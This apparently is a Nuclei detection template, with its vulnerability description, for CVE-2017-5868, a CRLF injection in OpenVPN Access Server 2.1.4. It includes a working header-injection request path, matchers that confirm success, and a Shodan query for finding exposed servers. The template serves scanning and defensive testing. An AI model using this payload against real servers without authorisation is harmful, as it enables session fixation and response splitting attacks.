CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
PoC代码[已公开]
id: CVE-2017-5868
info:
name: OpenVPN Access Server 2.1.4 - CRLF Injection
author: ritikchaddha
severity: medium
description: |
CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
reference:
- https://www.openwall.com/lists/oss-security/2017/05/23/13
- http://www.securitytracker.com/id/1038547
- https://nvd.nist.gov/vuln/detail/CVE-2017-5868
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5868
cwe-id: CWE-93
epss-score: 0.05514
epss-percentile: 0.89876
cpe: cpe:2.3:a:openvpn:openvpn_access_server:2.1.4:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: openvpn
product: openvpn_access_server
shodan-query: cpe:"cpe:2.3:a:openvpn:openvpn_access_server"
tags: cve,cve2017,openvpn,crlf
http:
- method: GET
path:
- "{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "^Set-Cookie: crlfinjection=1;"
- type: status
status:
- 302
# digest: 4a0a004730450220572b624c7cf179f22bcdb3e30a8a0861d9966190d7986e91b0ee0197cc092f7f022100fff70c1bd6849d68ab33019a31ffd88740977984303f45c8c9561095455238b8:922c64590222798bb761d5b6d8e72950